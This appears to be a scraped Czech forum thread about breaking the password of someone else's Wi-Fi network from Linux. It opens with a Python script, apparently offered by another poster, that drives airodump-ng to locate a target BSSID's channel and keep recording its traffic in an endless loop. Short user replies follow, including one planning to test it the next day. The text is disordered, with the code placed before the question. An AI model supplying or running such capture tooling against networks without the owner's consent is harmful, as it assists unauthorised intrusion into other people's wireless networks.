# interval v sekundách ve kterým jakoby ždycky spočitáme aktuální beacon rate
min_delta = 10.0

# příkazy airodumpu
# první pro záznam druhej pro hledání toho kanálu
cmd_rec = ['airodump-ng', '--write', wr_prefix, '--bssid', target_bssid,'-c', None, interface]
cmd_ch = ['airodump-ng', '--bssid', target_bssid, interface]

# jak jako vypadá řádek tabulky pod kterým sou jakoby vypsaný jednotlivý stanice připojený
# uplně horní řádek tabulky vypadá pro voba ty naše různý příkazy různě :O :O
stations_header = b'\x1b[0K\x1b[1B BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes\x1b[0K\n'

   

def dump():
   
   
    table_header = b'\x1b[0K\x1b[1B BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID\x1b[0K\n'
   
    is_bssid_row = False
    beacons_delta = 0
    last_sum_beacons = 0
    last_time = 0.0
    rate = 0.0
   
    proc = Popen(cmd_rec, stdout=PIPE)
    time.sleep(1)
   
    for line in proc.stdout:
        t = time.time()
        dt = t - last_time
        if dt > min_delta:
           
           
            if is_bssid_row:
                   
                if not line == stations_header:
                    blocks = re.split(r'\s+', line.decode('utf8'))
                    block = blocks[4]
                    try:
                        sum_beacons = int(block)
                    except ValueError:
                        # když neni stringem s číslem uvnitř
                        continue
                    beacons_delta = sum_beacons - last_sum_beacons
                   
                    last_time = t
                    last_sum_beacons = sum_beacons
                   
                    if dt != 0:
                        rate = beacons_delta / dt
                        print(rate)
                        if rate < min_rate:
                            proc.kill()
                            break
                   
                   
                is_bssid_row = False
               
            if( line == table_header):
                is_bssid_row = True
       
        if line == table_header:
            ln = f'\n beacons/s: {rate:.2f} delta: {beacons_delta} sum:{last_sum_beacons}\n\n'
            ln = bytes(ln, 'utf-8')
            sys.stdout.buffer.write(ln)
       
        sys.stdout.buffer.write(line)
        sys.stdout.buffer.flush()
       


    proc.stdout.close()
    proc.wait()
   
   
   
def find_channel():
   
    # liší se :O :O
    # stanice maj stejnej jako předtim
    table_header = b'\x1b[0K\x1b[1B BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID\x1b[0K\n'
   
    chann_num = -1
   
    is_bssid_row = False

   
    proc = Popen(cmd_ch, stdout=PIPE)
    time.sleep(1)
   
    for line in proc.stdout:

        if is_bssid_row:
                   
            if not line == stations_header:
                blocks = re.split(r'\s+', line.decode('utf8'))
                print(blocks)
                try:
                    chann_num = int(blocks[6])
                    proc.kill()
                    break
                except ValueError:
                    # když neni stringem s číslem uvnitř
                    continue
               
                is_bssid_row = False
               
        if( line == table_header):
            is_bssid_row = True

       
        sys.stdout.buffer.write(line)
        sys.stdout.buffer.flush()
       
       


    proc.stdout.close()
    proc.wait()
    return chann_num



if __name__ == '__main__':

    logging.basicConfig(filename='airodumpovadlo.log', format='%(asctime)s %(message)s', level=logging.DEBUG)
    while True:
        logging.info('hledá se kanál BSSID == ' + target_bssid)
        chann_num = find_channel()
        logging.info(f'našel se kanál: {chann_num}')
        cmd_rec[6] = str(chann_num)
        dump()
        logging.info('dump zkončil')

    print('hotovo!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!§')

Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.

Oznacovat nieco za konspiraciu, len na zaklade vlastnej nevedomosti je hlupe.
náhodou to je dobrej vodhad si taky jako myslim že ty videjka sou podvod :o :D :D ;)
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: novak_josef_2019 24. 11. 2020, 17:57:42
Děkuji ti moc Wráno, hned zítra to otestuji a případně se pokusím o dodělání, což v mém případě bude oříšek ;)